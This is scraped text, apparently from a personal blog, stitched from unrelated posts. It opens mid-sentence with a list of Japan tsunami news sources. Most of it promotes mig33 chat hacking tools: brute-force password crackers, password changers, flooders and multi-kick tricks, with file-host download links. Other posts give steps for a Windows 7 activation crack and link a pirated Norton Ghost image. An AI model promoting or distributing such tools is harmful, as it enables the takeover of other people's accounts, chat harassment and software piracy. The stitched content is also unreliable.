that factor suffered injuries. Several employees at a Panasonic
factory were also hurt in the quake.
Here are some online resources for keeping up-to-date on the disaster
in Japan, and the tsunamis expected to hit US shores:
Japan:

NY Times live blog (with YouTube video updates)
Japanese Ustream channel (live video)
Wall Street Journal live blog
MSNBC live blog
Google crisis response

Hawaii:

KHON 2 (local news video stream)
KITV live blog
@HawaiiRedCross
@HawaiiNewsNow

Washington:

KOMO 4 Seattle
KIRO 7 Seattle

Oregon:

KATU 2 Portland (live video)

California:

KRON 4 San Francisco
KABC 7 Los Angeles
KSWB 69 San Diego

mohitkalsi.blogspot.com

Run multiple JARs at the same time in java phones

Combine many JARs in a single JAR then you can run the combined JAR and then you can switch between different JARs running at the same time. Its possible to run opera mini, mig33, snaptu and other jars at the same time in non-multitaskng phones.

1st Download Multime constructor then extract ZIP file and open multime.exe

1. Click on the button mentioned in image to add a jars
2. Click on the button mentioned in image to name the output jar
3) Click on the button mentioned in image to compile the combined jar.

After complete you will get this window:

Click “Ok” Then check “Output” folder in multime directory. you will find your combained JAR file.

Text Cloner


- AUTO SAVE ID AND LOAD
- KICK
- MUTE
- UNMUTE
- ADD FRIEND
- CHAT BOX
- UPDATE STATUS
- SEND TO PVT
- SEND TO ROOM
- SEND FLOOD WITH EMOT (EMOT+ COUNT)(ONLY 17 TIME)
- SET PRESENCE
- SAVE ROOM & FLOOD
- AUTO ENTER
- AUTO USER LIST
- AUTO REFRASH CHAT BOX

+ CLONE SYSTEM:
- CLONE USER
- CLONE ALL USERS or
- CLONE TARGET

Download:
http://www.4shared.com/file/rR22DjGp/T3XT_CLON3RV10.html
or
http://www.ziddu.com/download/14117112/T3XTCLON3R.V1.0.zip.html

Room KEDIRI Wates


- 10 ids set
- Target list
- Room spy
- Timer delay
- Manual/auto kick
- Login array

http://www.4shared.com/file/9tifatQO/Kediri_wates.html
or
http://www.ziddu.com/download/13798270/Kediriwates.zip.html

PTC Sites Earn Money: Paid To Click #1

ClixSense
Pay per click: $0.01
Pay per ref click: $0.001
Min cashout: $10.00
Cashout time monthly

NeoBux
Pay per click: $0.01
Pay per ref click: $0.005
Min cashout: $2.00
Cashout time Instant

InCentria
Pay per click: $0.001 – $0.005
Pay per ref click: $0.0001 – $0.0005
Min cashout: $1.00
Cashout time 1-2 days

Buxpool
Pay per click: $0.002
Pay per ref click: $0.0004
Min cashot: $1.00
Cashout time 24hrs

Bux-Matrix
Pay per click: $0.004
Pay per ref click: $0.002
Min cashout: $2.00
Cashout time within 7 days

Fox-bux
Pay per click: $0.005
Pay per ref click: $0.00175
Min cashout: $1.05
Cashout wait time 24 hours

ifbux
Pay per click: $0.01
Pay per ref click: $0.005
Min cashout: $4.00
Cashout wait time 24 hours

Onbux
Pay per click: $0.01
Pay per ref click: $0.005
Min cashout: $2.00
Cashout wait time Instant

Cashium
Pay per click: $0.008
Pay per ref click: $0.004
Min cashout: $2.00
Cashout wait time 3-5 days

SmileyClicks
Pay per click: $0.001
Pay per ref click: $0.00025
Min cashout: $0.10
Cashout wait time 24 hours

Bux.to
Pay per click: $0.01
Pay per ref click: $0.1
payment method: AlertPay and YourBuxCard

**use this sites in your own risk.

Mig33 Admin Booster





Download
Code: http://www.mediafire.com/?rj542228m1q1z46

SBPA SOCKMIX Brute Password Attack


SBPA SOCKMIX Brute Password Attack Standard Edition
- Brute mode
- Target mode
- Speed Brute Fast/Mid/Slow
- Manual Speed Brute
- Play Sound if Successfully
- Auto Change Pass if Successfully

Download Now

KPM Password Changer


- Set series
- Change password

Download Now

Brute Force Ultimate


- Password editor
- ID Generator
- 1 by 1 target mode
- All target mode
- 5 type login speed

Download Now

Pander (classical)


- Checking ID
- Checking numbers
- ID gnerator
- Password changer
- Password cracker
- Text manager

Download Now

MigMan Inviters


- Unlimited IDs login
- Phone number inviter, interval
- Password cracker

Download Now

Password Changer


- Single ID password change

Download:
http://www.4shared.com/file/FOMJccQz/PC_by_buzzard.html
or
http://www.ziddu.com/download/13464873/PCbybuzzard.zip.html

Moderating tool v2.3 [RDW]


- AUTO WELCOME [Editable AutoGreet Msg]
- AUTO ADVERTISEMENT [Editable Autovertise Msg]
- AUTO WARNING [Editable Autowarn Msg]
- NEVER DISCONNECT IF NOT INTERNET PROBLEM
- YOU CAN LOGIN THE ARMY MANUALY,JUST DOUBLE CLICK THE INDICATOR COLOUR
- FULL ADMIN + MODERATOR FUNCTIONAL
- UNLIMITED KIKING
- UNLIMITED ADD MOD / DMOD MODERATOR
- UNLIMITED BANNING
- MANUALY UNBANNING
- MIG33 PROTABLE MESSENGER WITH FULL EMOTION
- ROOM CHAT
- MANUALY CLEAR ROOM CHAT TEXT
- UNLIMITED SEPERATE PRIVATE CHAT
- UNLIMITED SEPERATE GROUP CHAT
- AUTO LEFT GROUP CHAT
- UNLIMITED FLOOD DETECTOR WITHOUT HANG
- TEXT FILTER DETECTOR [ For Text Flooder ]
- EMOTION FLOOD DETECTOR [ For emotion flooder]
- UNLIMITED BRUTE FORCE RANDOM + SERIES MULTI DETECTING IN 0.1 SEC
- AUTO / MANUAL LIST & ACTION
- AUTO ANSWER PRIVATE CHAT
- AUTO KICK
- AUTO BAN
- AUTO MIG33 SERVER/IP CHANGER
- AUTO REFRESH USER LIST
- SAVE USER ID,ROOM LIST, MANUAL KICK/BAN/UNBAN LIST
- UNLIMITED PROTECT IDS [Editable protect ids]
- MANUAL ADD BAD WORDS [Editable Bad words]
- ROOM CHAT SOUND ON/OFF
- AUTO KICK/BAN ROLL MULTY SERIES BY USING HIGH TIME X
- AUTO BOT STOPER
- AUTO ANY BOT ADDED IF SOMEONE STOP BOT
- VIEWS ROOM USERS PROFILE INCLUDING LIKES,GIFT,FOOTPRINTS & AVATAR VOTE
- VIEW MY PROFILE,PHOTOS,GROUPS LIST & CHECK BALLANCE
- CHECK MAILBOX SEND & DELETE MAIL
- WINAMP UPDATED STATAS


Download:

http://www.ziddu.com/download/13575421/RDW-Moderating-Tool-V2.3.zip.html

SAVE YOURSELF FROM MULTIKICK.

U can fight alone with multikicker. In this trick u must be a fast. After multikicker entered, kick 1 of id that he used. Than u leave room n enter again.. After u see the time '20s remaining' u ready to kick other id, n after '..has failed' u must started to kick again. So,multicker doesnt have a chance kick anyone. But he get a migrain.

Fast Room Lefting.

Sometime when we chat on chatroom and if we have starting kick by someone we must leave the room as fast as we can. The method is like this, click menu > leave room > ok. But when the process leave room working after 1 second press ok again. With this method we can leave the room before kicked by some one.

ABOUT MIG33 BACKROOM

Now it is hard to get in to the back room. And now you can't vote being in the back room. To catch up the backroom just enter in to the room and press LEAVE ROOM, before you leave the room press BACK, so that you don't loose the room. Now you will be in the back room.
The other way to get in to the backroom is:-
Go to CREATE ROOM, & type the room name with one special corrector. . .
If you want to enter in to BANGLADESH room, . .
Just enter room name as BÄNGLADESH, The special corrector here used is ( Ä ). This special corrector will be in your mobile for sure. But you can't use this in PC.

real multi-kick

This is the real multi-kick. For this you need a PC with internet connection! And an EMULATOR software.
Go to Google search engine & search Emulator & download.
For example" type:- "nhal emulator" & click search.
Download the software. Using it you can log-in by 8-12 IDs at once.
Kick them out!

wELCOMe tO bESt mULTI-Kick tRICk

This is called fastest kicking. This can only be used by using mobile phones. That can use be used for multi-kicking. You connot use this in PC.
Most of the powerful mobile kickers say this is very efficent way of kicking.
Enter in to the room with your multi-kicking nicks. Go to kick use & pick the one who you want to kick from all your nick in the room. When you are done.
Just minimize all your migs & make a call to any where most probably you might make a free call [BANGLADESHI can call 555/121].
So your GPRS connection will be on-hold. Now press menu and take all your minimized migs & request the kick. All migs will be on kick RESERVING....... finally end the call.
So that all votes are might see the message 1 or 0 more vote has been started. . . . . . & there is very less chance that & one can escape from this type of a kick.
This trick can also be used for fast flooding.

·.¸¸.·´`°·.◊øΞø◊.·°´`·.¸¸.·
visit for more about mig33

SAVE YOURSELF FROM MULTIKICK.

U can fight alone with multikicker. In this trick u must be a fast. After multikicker entered, kick 1 of id that he used. Than u leave room n enter again.. After u see the time '20s remaining' u ready to kick other id, n after '..has failed' u must started to kick again. So,multicker doesnt have a chance kick anyone. But he get a migrain.

FASTEST KICK STARTING

Use 2 mig file with same ID. So that you will have a clone of your ID. Enter in to the room from one mig file and after that enter the second mig file. Now the first mig file you entered in the room will be in the back room. Now leave the room from the second mig you entered (which is the active one) and again take chat rooms and get ready to enter the room. But don't enter the room yet, just keep it ready to enter. Take the person who you want to stat a kick from the one in the back room and make it ready to request a kick Enter in to the room from the one which is ready to enter in to the room and at the same time request the kick from the one in the back room. No one else can start a kick to kick you. No one will be as fast as you.

Thursday, March 10, 2011

How to apply for mig33 admin

Many people don't know how to apply for administrator. For them i telling how to apply for admin post. You will contact to e-mail in "contact@mig33". In mail just mention your mig id, your country name & why you interested in admin post? Copy that mail & send this mail 5/7 times. At last write some respectable word like "THANK YOU"

NOTE: Hello visitor, you can apply for admin here in (mig33 software & about admin page). just remember one thing that mig33 staff select admin. You have to try it yourself. BEST OF LUCK

I m giving a format, What you write in your e-mail.

Hey! I am a regular mig user. I am from 'X' (country name). My mig id 'Y' (your user id name). I am very much interested in your admin post
because ................
If you give me admin post i will be very thankfull.
I hope you would be kind grant me and give me admin post.
THANK YOU.

Download all mig33 latest apps

Mig33 beta v.4.00.jar 183kb
Mig33 beta v.3.07.jar NeW 116Kb
Mig33 beta.v3.07 107kb
Mig33 beta.V3.10 116kb
Mig33 lite v3.07 107 kb
Mig33 plus.V.3.05 96kb
Mig33 beta v.3.05.jar 107kb
Mig33 beta.V3.05.Jad 107kb.
Mig33 beta.V3.05.Jad 107kb
Mig33 beta.V3.04.jad (unsigned) 96 kb
Mig33 beta.V3.04.Jar (unsigned) 96kb.
Mig33 beta v3.04.Jad 96kb
Mig33 lite v3.02.Jar 64kb
Mig33 vista beta.V.3.02 96kb
Mig33 vista lite.V3.01.jar 65kb
Mig33 vista.V2.04.jar 64kb
Bad girl mig33.V.2.02.jar 64kb
Billabong mig33.V.2.04.Jar 71kb
Guess mig33.V.2.02 64kb.
Playboy mig33.V.2.02.jar 64kb

mig33 other versions

+Mig33Vista204-63kb
+Mig33Vista Lite301-64kb
+Mig33Vista Beta301-97kb
+Mig33Vista Beta302-97kb
+Mig33 Plus-85kb
+Mig33 Lite2D-72kb
+Mig33 Lite3D-73kb
+Mig33 Multi67kb
+Normal Mig33Lite-62kb
+Normal Mig33Beta-97kb
+Mig33BetaII.V3.05-107kb
+Bad2.jar-64kb
+Play Boy.jar-65kb
+Billabong2-70kb
+Guess.jar-63kb

Friends download the most beautifull mig33 flower skin & enjoy.

- - - - - - - - - - - -
+Mig33 Flower01-165kb
+Mig33 Flower02-138kb
+Mig33 Flower03-199kb
+Mig33 Flower04-149kb
+Mig33 Flower05-150kb
+Mig33 Flower06-168kb
+Mig33 Flower07-230kb
+Mig33 Flower08-189kb
+Mig33 Flower09-210kb
+Mig33 Flower10-213kb
+Mig33 Flower11-190kb

Download from here all exclusive mig33 girls skin software for all symbian & java mobile.

+Cute Girl01-204kb
+Cute Girl02-205kb
+Cute Girl03-215kb
+Cute Girl05-116kb
+Cute Girl05-174kb
+Cute Girl06-119kb
+Cute Girl07-206kb
+Cute Girl08-215kb
+Cute Girl09-208kb
+Cute Girl10-209kb
+Cute Girl11-195kb
+Cute Girl12-218kb
+Cute Girl13-199kb
+Cute Girl14-218kb
+Cute Girl15-202kb
+Cute Girl16-207kb
+Cute Girl17-191kb
+Cute Girl18-191kb
+Cute Girl19-180kb
+Cute Girl20-161kb

Monday, March 7, 2011

android market

Attachments List:
1. volume-control-pro.1.02.zip
2. StopWatch-Timer_1.12.zip
3. Porn_Video_Streaming_1.0.zip
4. Real_player_by_shivsena.zip

All Types Of Computer Projects



OfflineExaminer.zip

BANKING.zip
CrimeFile.zip

Banking_System.zip

Banking_System.zip

CivilRegistry.zip

WINDOWS 7 Activator 2010 all version ...For Non Activated Windows 7 Users become a geniune OS and updated anytime....

----
Avis positif
Windows 7 All Version ACTIVATOR - NEW~ 27-08-2010 updated daily ..





For Non Activated Windows 7 Users, Do The Following.

--------
First
--------

1. Run The "7Loader Release 5.exe" file Click Select Task

Here You Can Either Choose To Let Your PC Have The Name Of A Brand.

2. Select The "Please Select" Dropdown Windows and Choose Any Brand Name That You Want Your Computer To Show.. Example : Acer,Dell,alienware Biostar ECT.

3. Then Click "Activate slic Present" And Wait (Be Patient While It Works) Then another Window Will Pop Up .. Just Choose anything.

4. Afterward Click "Install information 32bit" Or "Install information 64Bit" Depending On Your Operating System.

5. Now Hit The "Hazar Option 2" Button ... Wait Till Finished Then restart Your Pc.


For Those Who Just Want a Straight Forward Activation Just Run "None slic Option 1" Followed By "Hazar Option 2" Then Reboot.

After Doing This Upon Reboot.. Go To "My Computer" Properties You Will Then See Windows Is Activated...........Or Just Run The Loader And Choose Status.

-----------
Finally
-----------










Creating Universal Ghost Usb Boot Disk And Cd

----
Avis positif
If you want to use Norton Ghost 2003 to create an image of a PC's primary partition you will find it has 2 serious limitations:
1- The USB support driver they use (from Iomega) can only be installed in USB1 or USB2 mode (not both), and it is not universal - it didn't recognize my external USB IBM mobile HD .
2- You can't create a Ghost bootable CD - only a floppy. How can you clone a newly bought laptop, most of which don't have a floppy anymore?
Here's How to:
1- create a Ghost floppy with USB support (1 or 2 - it won't matter later)
2- download 2 files kxlrw40an.exe and mhairu.zip
CODE

http://panasonic.co.jp/pcc/products/drive/cdrrw/kxlrw40an/driver/kxlrw40an.exe


CODE

http://www.stefan2000.com/darkehorse/PC/DOS/Drivers/USB/mhairu.zip


From the first file (Panasonic driver for a USB CDRW) you will need the file usbaspi.sys found under "F2H" sub directory after extraction of the downloaded archive. From the second archive you need di1000dd.sys
3- Copy these 2 files to the USB folder on the Ghost floppy, and delete any other files in that folder. Also delete the file guest.exe from the floppy's root.
4- And finaly:
edit the AUTOEXEC.BAT file - delete the line: guest.exe
and edit CONFIG.SYS - delete all entries and enter:
device=usb\USBASPI.SYS /v /e /o /u
device=usb\Di1000dd.SYS
LASTDRIVE = Z

That's it. You can now boot with this floppy and have full USB support so you can create the image on an external USB drive.

If you want to create a bootable CD you can use Nero:
Choose to create a "CD-ROM (boot)" from the wizard, under Boot tab leave the default "bootable logical drive: as A:\ . Insert your Ghost floppy to the drive, drag all the files from the floppy to "New compilation" and burn. You now have a bootable Ghost CD that even Symantec doesn't have..

PS if you need Norton Ghost 2003 get the full retail here:
CODE

http://soft.zmdinfo.ha.cn/system/Norton.Ghost.2003%E6%AD%A3%E5%BC%8F%E9%9B%B6%E5%94%AE%E7%89%88.iso.rar